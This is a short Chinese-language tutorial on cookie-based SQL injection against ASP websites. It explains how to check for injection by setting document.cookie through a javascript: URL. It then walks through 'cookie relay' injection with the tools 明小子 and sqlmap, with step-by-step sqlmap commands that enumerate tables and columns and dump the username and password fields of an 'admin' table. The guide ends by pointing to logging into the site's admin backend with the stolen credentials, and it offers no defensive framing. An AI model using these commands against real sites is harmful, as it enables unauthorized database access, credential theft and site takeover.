cookie中转注入，使用sqlmap中转注入

一,判断是否有cookie注入：
目标网站http://www.xxx.com/x.asp?id=1
1.在IE浏览器访问去掉参数（id=1）的url: http://www.xxx.com/x.asp?(加载页面，显示不正常，原因是没有输参数)。
2.在IE浏览器输入javascript:alert(document.cookie="id="+escape("1"));（添加cookie信息）,再次访问http://www.xxx.com/x.asp?（加载页面，显示正常）。此时这个网页就存在cookie注入，反之没有。
 
二,利用cookie中转注入：
     使用的工具有: 手工注入辅助工具+明小子，Sqlmap。
 
 
手工注入辅助工具+明小子：
 
1.输入url,然后点击转到。如图



2.点击Cookie中转，之后会跳出一个新的url 如图



3.打开明小子，利用这个url。如图



4.开始检测 如图



2.利用Sqlmap Cookie注入：
1.命令：sqlmap.py –u”url” --cookie “参数” --level 2
注:例如目标网站为：http://www.xxx.com/x.asp?id=1，则sqlmap命令为sqlmap.py –u”http://www.xxx.com/x.asp” --cookie “id=1” --level 2



2.执行命令： sqlmap.py –u”url” --cookie “参数” --level 2 --tables(查所有表)如图



3.执行命令：sqlmap.py –u”url” --cookie“参数” --level 2 --tables --columns –T”admin”(查询列名)



4.执行命令： sqlmap.py –u”url” --cookie “参数” --level 2 --tables --dump –C”usernma,paasword” –T”admin”(查询字段)



OK，两种方法都可以使用。成功拿到帐号密码之后，接下就找后台管理登入进去，这里就不多介绍了。